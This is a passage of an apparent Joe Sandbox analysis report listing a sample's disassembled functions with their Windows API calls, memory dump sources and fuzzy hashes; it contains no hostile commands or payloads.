Instruction Fuzzy Hash: C7418E31504219FFDF159F64C844AEABBB4FB46364F10822AF829A22D1C730AD95DFA1

Function 00DCC145 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00DCC156
PostMessageW.USER32(?,00000201,00000001), ref: 00DCC200
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00DCC208
PostMessageW.USER32(?,00000202,00000000), ref: 00DCC216
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00DCC21E

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: f1b7bb0cc86914fdeb11409d7a58eae307cdc65ad24442f239bbfe8b6bbd3221
Instruction ID: 3706c71a503f79d23267960ed63edc7a38bee0a30fbd2de384d287824e2a24c5
Opcode Fuzzy Hash: f1b7bb0cc86914fdeb11409d7a58eae307cdc65ad24442f239bbfe8b6bbd3221
Instruction Fuzzy Hash: 6F31C07190021AEFDB04CFA9DD4CBDE3BB5EB04325F144218F925AB1D1C7B09904CBA0

Function 00DCE9B5 Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00DCE9CD
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00DCE9EA
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00DCEA22
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00DCEA48
_wcsstr.LIBCMT ref: 00DCEA52

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: bff018c556d8da1bd0990872aef712171e445b4511202bb1e9de2ab1e0a5a5ca
Instruction ID: a4f0642b3fe3342144e7765adac9878154201ba8cd5d0befa4a4cd0daa5a8da6
Opcode Fuzzy Hash: bff018c556d8da1bd0990872aef712171e445b4511202bb1e9de2ab1e0a5a5ca
Instruction Fuzzy Hash: 4521D4B2608211BEEB159B699C49FBB7FA8EF45750F14802DF80ADB091EE71DD4096B0

Function 00DFDC79 Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00DAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00DAAF8E

GetWindowLongW.USER32(?,000000F0), ref: 00DFDCC0
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00DFDCE4
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00DFDCFC
GetSystemMetrics.USER32(00000004), ref: 00DFDD24
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,00DE407D,00000000), ref: 00DFDD42

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 15ff208f0ef4461627ac3ac31f909f424406c3d0c86a2d51d8e7b13419b27267
Instruction ID: f69308b374337c155eedcf2e6ccc39f7ba952fa23de9e9b80def21c1973e734c
Opcode Fuzzy Hash: 15ff208f0ef4461627ac3ac31f909f424406c3d0c86a2d51d8e7b13419b27267
Instruction Fuzzy Hash: A421F131604319AFCB245F398C48BB937A7FB46325B1A8B24FA36D61E0D370D854CBA0

Function 00DCCA6D Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00DCCA86

Part of subcall function 00D97E53: _memmove.LIBCMT ref: 00D97EB9

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00DCCAB8
__itow.LIBCMT ref: 00DCCAD0
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00DCCAF6
__itow.LIBCMT ref: 00DCCB07

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID:
API String ID: 2983881199-0
Opcode ID: 44c86f73d23881482fe6c1b31732d7c83a6b3e33a0a1eebd6ccd3da723fb29d8
Instruction ID: 195f2e2f3f67e20fb16a87d795aaf39569538beea6c111124437d41044230129
Opcode Fuzzy Hash: 44c86f73d23881482fe6c1b31732d7c83a6b3e33a0a1eebd6ccd3da723fb29d8
Instruction Fuzzy Hash: 3F21D472A102057BDF21AAA59C4AFDE7A69EF59750F046028FA09E7181DA60CD0587B0

Function 00DE89AD Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00DE89CE
GetForegroundWindow.USER32 ref: 00DE89E5
GetDC.USER32(00000000), ref: 00DE8A21
GetPixel.GDI32(00000000,?,00000003), ref: 00DE8A2D
ReleaseDC.USER32(00000000,00000003), ref: 00DE8A68

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 90e0f0d397f20ca7c1414401e854c28b2dc7b3577f348f5f689bfb5f3c0c4c5b
Instruction ID: f6190f7c610db35cf4f2f1df8efa1e9a3915e2f2f80d7952e8c03d9dd4c1a1c3
Opcode Fuzzy Hash: 90e0f0d397f20ca7c1414401e854c28b2dc7b3577f348f5f689bfb5f3c0c4c5b
Instruction Fuzzy Hash: E7218175A00204AFDB00EFA6CC85AAA7BF5EF48311B05C479E94A97352CB70AD04CB70

Function 00DAB58B Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00DAB5EB
SelectObject.GDI32(?,00000000), ref: 00DAB5FA
BeginPath.GDI32(?), ref: 00DAB611
SelectObject.GDI32(?,00000000), ref: 00DAB63B

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: d1572ed55d74d6c0d45cbb86f852dd5b15a9c7df18d42f886e096db85ab0a4b7
Instruction ID: 8251a368e40a859e3aa72f37197fecd128e09ef87bbbc39bde63d04c8d99a6d3
Opcode Fuzzy Hash: d1572ed55d74d6c0d45cbb86f852dd5b15a9c7df18d42f886e096db85ab0a4b7
Instruction Fuzzy Hash: 2F21A170900309EFDB289F16ED487A97BE9FB0232AF184557F550BA1E1D370989ACF60

Function 00DB2E57 Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 00DB2E81
CreateThread.KERNEL32(?,?,00DB2FB7,00000000,?,?), ref: 00DB2EC5
GetLastError.KERNEL32 ref: 00DB2ECF
_free.LIBCMT ref: 00DB2ED8
__dosmaperr.LIBCMT ref: 00DB2EE3

Part of subcall function 00DB889E: __getptd_noexit.LIBCMT ref: 00DB889E

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
String ID:
API String ID: 2664167353-0
Opcode ID: 7ae65eef401da53334791530db1327c233ece4bcd78a001dbe216aa96a1a0371
Instruction ID: 53fed72bdc8b37f375548fe0691be02c5d4097450c404b2cd1dd156a64776e3f
Opcode Fuzzy Hash: 7ae65eef401da53334791530db1327c233ece4bcd78a001dbe216aa96a1a0371
Instruction Fuzzy Hash: B3118B37104706EFDB21AFA6AC42DFB7BA8EF45770B140529FA1A96191EB31C80096B0

Function 00DCB8E7 Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00DCB903
GetLastError.KERNEL32(?,00DCB3CB,?,?,?), ref: 00DCB90D
GetProcessHeap.KERNEL32(00000008,?,?,00DCB3CB,?,?,?), ref: 00DCB91C
RtlAllocateHeap.NTDLL(00000000,?,00DCB3CB), ref: 00DCB923
GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00DCB93A

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
String ID:
API String ID: 883493501-0
Opcode ID: c12553d0c95e734117e1bdea4544393c31b72495d2d4253309f735f03a960076
Instruction ID: 134d477651ce1ea42693692e6ff62fe1d3070efff888e22a7ede123ade7d0c8e
Opcode Fuzzy Hash: c12553d0c95e734117e1bdea4544393c31b72495d2d4253309f735f03a960076
Instruction Fuzzy Hash: 8F016971201209BFDB114FA6DC89EAB3BADEF8A764B14402AF945D3260DB75CC44DE70

Function 00DD8355 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00DD8371
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00DD837F
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00DD8387
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00DD8391
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00DD83CD

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 8b406a01ab09e62c82e83fe28e623d91637528a3e242235d1bb1b449286aea48
Instruction ID: 69e1a548dd2042a816e115550c33b092e17111ca0623dae2888e67a1585cadf2
Opcode Fuzzy Hash: 8b406a01ab09e62c82e83fe28e623d91637528a3e242235d1bb1b449286aea48
Instruction Fuzzy Hash: C4016931D05619EFCF00AFAAEC48AEEBB78FB08B11F000046E545F2250CF709554D7A1

Function 00DCA857 Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.COMBASE ref: 00DCA874
ProgIDFromCLSID.COMBASE(?,00000000), ref: 00DCA88F
lstrcmpiW.KERNEL32(?,00000000), ref: 00DCA89D
CoTaskMemFree.COMBASE(00000000), ref: 00DCA8AD
CLSIDFromString.COMBASE(?,?), ref: 00DCA8B9

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: ef169f24cdef89a344a2ea404dc302d1d451ca2e2af1def602fb85e4000f836d
Instruction ID: 7943ba5bea14ed13ec2dbe16e199504fe1a92bc962fa02f7220ca3b4cad74798
Opcode Fuzzy Hash: ef169f24cdef89a344a2ea404dc302d1d451ca2e2af1def602fb85e4000f836d
Instruction Fuzzy Hash: 1F018B7660021AAFDB144F69DC84BAABBADEF44399F158029B901E3210D770DD459BB1

Function 00DCB7EF Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00DCB806
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00DCB810
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00DCB81F
RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 00DCB826
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00DCB83C

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: HeapInformationToken$AllocateErrorLastProcess
String ID:
API String ID: 47921759-0
Opcode ID: d87506896310df2ac47dee82c5ed73880e30f26751fd8644a4763f61b031af93
Instruction ID: 7de1d6fd245a1fd17396fae301ad365d8ffcc7a5050c2df8a9cf160efbde4e46
Opcode Fuzzy Hash: d87506896310df2ac47dee82c5ed73880e30f26751fd8644a4763f61b031af93
Instruction Fuzzy Hash: 69F0A975201205BFEB210FA6EC99FAB3B6DFF4A764F04802AF941D7150CBA0D805CA70

Function 00DCB78E Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00DCB7A5
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00DCB7AF
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00DCB7BE
RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 00DCB7C5
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00DCB7DB

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: HeapInformationToken$AllocateErrorLastProcess
String ID:
API String ID: 47921759-0
Opcode ID: c20b9198e501a1a0023d0f670868757c803b693df1f7d817b3391e6e33aa1aec
Instruction ID: 5f79af5892380b12960e65bded06e74565722dbabe26281855ef9050ebf258bc
Opcode Fuzzy Hash: c20b9198e501a1a0023d0f670868757c803b693df1f7d817b3391e6e33aa1aec
Instruction Fuzzy Hash: 18F0AF752413557FEB100FA6AC89FAB3BADFF8A765F04801AF940D7190CB60DC058A70

Function 00DCFA7B Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00DCFA8F
GetWindowTextW.USER32(00000000,?,00000100), ref: 00DCFAA6
MessageBeep.USER32(00000000), ref: 00DCFABE
KillTimer.USER32(?,0000040A), ref: 00DCFADA
EndDialog.USER32(?,00000001), ref: 00DCFAF4

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: b66932e6cbb9391dcf0a54d6eab3fe8c3ddc72d70a413228086b58be84b1fff2
Instruction ID: 5a39d0412adc8147f4d2ccd91111dd8ca2ad43561a313ecac62066f04cce995e
Opcode Fuzzy Hash: b66932e6cbb9391dcf0a54d6eab3fe8c3ddc72d70a413228086b58be84b1fff2
Instruction Fuzzy Hash: 8B018130504706AFEF259F15DD4EFD6B7BABB00B09F04416DB187B60E0DBF4A9488A60

Function 00DAB517 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 00DAB526
StrokeAndFillPath.GDI32(?,?,00E0F583,00000000,?), ref: 00DAB542
SelectObject.GDI32(?,00000000), ref: 00DAB555
DeleteObject.GDI32 ref: 00DAB568
StrokePath.GDI32(?), ref: 00DAB583

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 41d99298e3023d97e4b7fcd39fd3bac70935c88e7f1f12a0260e29c46ec89a14
Instruction ID: 00741632243c3900f697cb0447b8ae938cda018050108a819706e84ab9dd214a
Opcode Fuzzy Hash: 41d99298e3023d97e4b7fcd39fd3bac70935c88e7f1f12a0260e29c46ec89a14
Instruction Fuzzy Hash: 18F0C930504704AFDB2D5F66ED087943FE5A702336F188655E5A9681F1C734899ADF10

Function 00DDFA15 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00DDFAB2
CoCreateInstance.COMBASE(00E1DA7C,00000000,00000001,00E1D8EC,?), ref: 00DDFACA

Part of subcall function 00D9CAEE: _memmove.LIBCMT ref: 00D9CB2F

CoUninitialize.COMBASE ref: 00DDFD2D

Strings

.lnk, xrefs: 00DDFA63, 00DDFA68, 00DDFA76

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: 5014d9703618309798c4595bf12fafa133b3bfc533f8fa828ce004dd7fc20d86
Instruction ID: d410670a673a972129e9b2a2c068ff01a69ee08d909094a057f6a539cc539986
Opcode Fuzzy Hash: 5014d9703618309798c4595bf12fafa133b3bfc533f8fa828ce004dd7fc20d86
Instruction Fuzzy Hash: 00A11871508305AFD700EF64C891EABB7E9EF99704F40492DF15597292EB70EA09CBB2

Function 00DADA5A Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 162COMMON

Download Yara Rule

Strings

